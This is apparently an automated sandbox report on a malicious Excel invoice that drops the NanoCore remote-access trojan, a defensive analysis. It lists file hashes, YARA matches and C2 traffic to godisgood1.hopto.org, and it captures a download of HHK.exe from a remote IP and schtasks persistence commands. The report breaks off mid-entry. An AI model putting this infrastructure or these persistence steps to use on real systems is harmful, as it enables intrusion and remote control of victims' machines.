              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:data
              Category:dropped
              Size (bytes):327432
              Entropy (8bit):7.99938831605763
              Encrypted:true
              SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
              MD5:7E8F4A764B981D5B82D1CC49D341E9C6
              SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
              SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
              SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
              Malicious:false
              C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat
              Process:C:\Users\user\AppData\Roaming\ALP.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):38
              Entropy (8bit):4.389264605993832
              Encrypted:false
              SSDEEP:3:oNXp4EaKC5VA:oNPaZ5q
              MD5:5A6E0D2362AAA48110B2CE3504E0586F
              SHA1:E18811D7D891996D153F169C2922767360A4B812
              SHA-256:9486A35404D71E6C389BF38557AF3FA02BDB1ED8C8E3DC4D2E7B1E4A537FD80B
              SHA-512:7F1D1BAD51E97361B449F4705B0B1359522780C1421C67E68E1CEC234D231AB37AA360DE15481924D504BB1E7AD88907205149FBB4C444E618B49028CE83D668
              Malicious:false
              Preview: C:\Users\user\AppData\Roaming\ALP.exe
              C:\Users\user\Desktop\~$INVOICE = 212888585 .xlsx
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):165
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
              MD5:797869BB881CFBCDAC2064F92B26E46F
              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
              Malicious:true

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.9979250456645605
              TrID:
              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
              • ZIP compressed archive (8000/1) 16.67%
              File name:INVOICE = 212888585 .xlsx
              File size:750528
              MD5:145e00853b80fb2d97676c4416f984a9
              SHA1:fa80c59ebbafc435e88ffdceae00450b56ec5d48
              SHA256:e9c342550d334bffc58a310997673e24eed03f4d2b9c441dec943b24e7d29d08
              SHA512:6e150bd0e392f3bb7696a0f8dcffcc453c508879165e0bef4eec268e0b5aebe40f03b4bb683970e91e4d3b010481c18c81d697f186cb813cb299deb4767d9467
              SSDEEP:12288:TV6IQfiTz7FZY3NJiA7cA0xJT+3nl8NksfTgyCbsmLjNyvvY4UnR8xOPkP+pO:56IpTz7FwJ5OT+3nlgksLfONAwtn9k6O

              File Icon

              Icon Hash:e4e2aa8aa4b4bcb4

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "/opt/package/joesandbox/database/analysis/483709/sample/INVOICE = 212888585 .xlsx"

              Indicators

              Has Summary Info:False
              Application Name:unknown
              Encrypted Document:False
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:False

              Summary

              Author:Admin
              Last Saved By:Windows User
              Create Time:2011-03-22T06:52:17Z
              Last Saved Time:2021-08-31T22:33:59Z
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Thumbnail Scaling Desired:false
              Company:<egyptian hak>
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:15.0300

              Streams

              Stream Path: \x1OLE10NaTivE, File Type: data, Stream Size: 1012122
              General
              Stream Path:\x1OLE10NaTivE
              File Type:data
              Stream Size:1012122
              Entropy:5.98350135727
              Base64 Encoded:True
              Stream Path: 4VrxadcXbYC3, File Type: empty, Stream Size: 0
              General
              Stream Path:4VrxadcXbYC3
              File Type:empty
              Stream Size:0
              Entropy:0.0
              Base64 Encoded:False
              Data ASCII:
              Data Raw:

              Network Behavior

              Snort IDS Alerts

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 09/15/21-11:57:44.918164 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 52167 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:57:44.952068 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 52167 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:57:45.713221 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49166 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:57:57.279937 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 50591 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:57:57.592426 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49167 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:03.786278 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49168 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:10.733434 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49169 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:18.728823 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49170 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:24.944716 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49171 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:30.859536 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 49972 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:58:31.159448 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49172 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:37.074525 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 51771 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:58:37.382541 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49173 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:43.374453 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59867 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:58:43.400039 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 59867 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:58:43.710255 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49174 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:49.925371 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49175 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:58:56.179738 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49176 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:59:02.410366 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49177 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:59:08.311570 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 49894 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:59:08.631450 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49178 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:59:13.662888 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 64645 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:59:13.959506 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49179 | 7712 | 192.168.2.22 | 103.147.184.84 |
| 09/15/21-11:59:20.299486 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 53745 | 8.8.8.8 | 192.168.2.22 |
| 09/15/21-11:59:20.602109 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49180 | 7712 | 192.168.2.22 | 103.147.184.84 |

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 15, 2021 11:57:37.286571980 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286592007 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286608934 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286644936 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286679983 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286679983 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286725044 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286758900 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.286763906 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286799908 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.286843061 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.295084953 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320092916 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320131063 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320156097 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320178986 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320199013 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320221901 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320247889 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320271969 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320291996 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320296049 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320317984 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320343018 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320347071 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320354939 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320370913 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320391893 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320395947 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320425034 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320446968 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320446968 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320470095 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320480108 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320492983 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320516109 CEST8049165136.144.41.96192.168.2.22
              Sep 15, 2021 11:57:37.320537090 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320538044 CEST8049165136.144.41.96192.168.2.22

              UDP Packets


              DNS Queries

              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
              Sep 15, 2021 11:57:44.887912035 CEST | 192.168.2.22 | 8.8.8.8 | 0xa31 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:57:44.918648005 CEST | 192.168.2.22 | 8.8.8.8 | 0xa31 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:57:57.250497103 CEST | 192.168.2.22 | 8.8.8.8 | 0xe79c | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:03.442548990 CEST | 192.168.2.22 | 8.8.8.8 | 0x39b8 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:10.334753036 CEST | 192.168.2.22 | 8.8.8.8 | 0x764b | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:10.411839008 CEST | 192.168.2.22 | 8.8.8.8 | 0x764b | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:18.370033026 CEST | 192.168.2.22 | 8.8.8.8 | 0x60a5 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:24.605493069 CEST | 192.168.2.22 | 8.8.8.8 | 0x6509 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:30.830264091 CEST | 192.168.2.22 | 8.8.8.8 | 0xe5a9 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:37.037288904 CEST | 192.168.2.22 | 8.8.8.8 | 0xfa31 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:43.340106964 CEST | 192.168.2.22 | 8.8.8.8 | 0xa0c5 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:43.375463963 CEST | 192.168.2.22 | 8.8.8.8 | 0xa0c5 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:49.590432882 CEST | 192.168.2.22 | 8.8.8.8 | 0x613a | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:55.833739996 CEST | 192.168.2.22 | 8.8.8.8 | 0xa1a | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:59:02.062530041 CEST | 192.168.2.22 | 8.8.8.8 | 0xe885 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:59:08.279654026 CEST | 192.168.2.22 | 8.8.8.8 | 0x2b51 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:59:13.634454966 CEST | 192.168.2.22 | 8.8.8.8 | 0x26b5 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:59:20.255594015 CEST | 192.168.2.22 | 8.8.8.8 | 0xb5a5 | Standard query (0) | godisgood1.hopto.org | A (IP address) | IN (0x0001)

              DNS Answers

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
              Sep 15, 2021 11:57:44.918164015 CEST | 8.8.8.8 | 192.168.2.22 | 0xa31 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:57:44.952068090 CEST | 8.8.8.8 | 192.168.2.22 | 0xa31 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:57:57.279937029 CEST | 8.8.8.8 | 192.168.2.22 | 0xe79c | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:03.470473051 CEST | 8.8.8.8 | 192.168.2.22 | 0x39b8 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:10.363152027 CEST | 8.8.8.8 | 192.168.2.22 | 0x764b | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:10.439944029 CEST | 8.8.8.8 | 192.168.2.22 | 0x764b | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:18.396095037 CEST | 8.8.8.8 | 192.168.2.22 | 0x60a5 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:24.631927967 CEST | 8.8.8.8 | 192.168.2.22 | 0x6509 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:30.859535933 CEST | 8.8.8.8 | 192.168.2.22 | 0xe5a9 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:37.074525118 CEST | 8.8.8.8 | 192.168.2.22 | 0xfa31 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:43.374453068 CEST | 8.8.8.8 | 192.168.2.22 | 0xa0c5 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:43.400038958 CEST | 8.8.8.8 | 192.168.2.22 | 0xa0c5 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:49.620173931 CEST | 8.8.8.8 | 192.168.2.22 | 0x613a | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:58:55.863729954 CEST | 8.8.8.8 | 192.168.2.22 | 0xa1a | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:59:02.091721058 CEST | 8.8.8.8 | 192.168.2.22 | 0xe885 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:59:08.311569929 CEST | 8.8.8.8 | 192.168.2.22 | 0x2b51 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:59:13.662888050 CEST | 8.8.8.8 | 192.168.2.22 | 0x26b5 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)
              Sep 15, 2021 11:59:20.299485922 CEST | 8.8.8.8 | 192.168.2.22 | 0xb5a5 | No error (0) | godisgood1.hopto.org | - | 103.147.184.84 | A (IP address) | IN (0x0001)

              HTTP Request Dependency Graph

              • 136.144.41.96

              HTTP Packets

              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              0 | 192.168.2.22 | 49165 | 136.144.41.96 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

              Timestamp | kBytes transferred | Direction | Data
              Sep 15, 2021 11:57:37.131921053 CEST | 0 | OUT | GET /HHK.exe HTTP/1.1
              Connection: Keep-Alive
              Host: 136.144.41.96
              Sep 15, 2021 11:57:37.183017969 CEST | 1 | IN | HTTP/1.1 200 OK
              Date: Wed, 15 Sep 2021 09:57:37 GMT
              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9
              Last-Modified: Wed, 15 Sep 2021 03:07:30 GMT
              ETag: "93400-5cbffffb6965c"
              Accept-Ranges: bytes
              Content-Length: 603136
              Keep-Alive: timeout=5, max=100
              Connection: Keep-Alive
              Content-Type: application/x-msdownload


              Code Manipulations

              Statistics

              Behavior

              System Behavior

              General

              Start time:11:56:28
              Start date:15/09/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13f8f0000
              File size:28253536 bytes
              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate

              General

              Start time:11:56:47
              Start date:15/09/2021
              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Wow64 process (32bit):true
              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Imagebase:0x400000
              File size:543304 bytes
              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:11:56:49
              Start date:15/09/2021
              Path:C:\Users\user\AppData\Roaming\ALP.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\ALP.exe
              Imagebase:0x910000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.477879710.000000000249D000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 30%, ReversingLabs
              Reputation:low

              General

              Start time:11:56:51
              Start date:15/09/2021
              Path:C:\Users\user\AppData\Roaming\ALP.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\ALP.exe
              Imagebase:0x910000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.694476042.00000000036F7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              General

              Start time:11:56:52
              Start date:15/09/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'
              Imagebase:0xd30000
              File size:179712 bytes
              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:11:56:54
              Start date:15/09/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp'
              Imagebase:0x860000
              File size:179712 bytes
              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:11:56:55
              Start date:15/09/2021
              Path:C:\Windows\System32\taskeng.exe
              Wow64 process (32bit):false
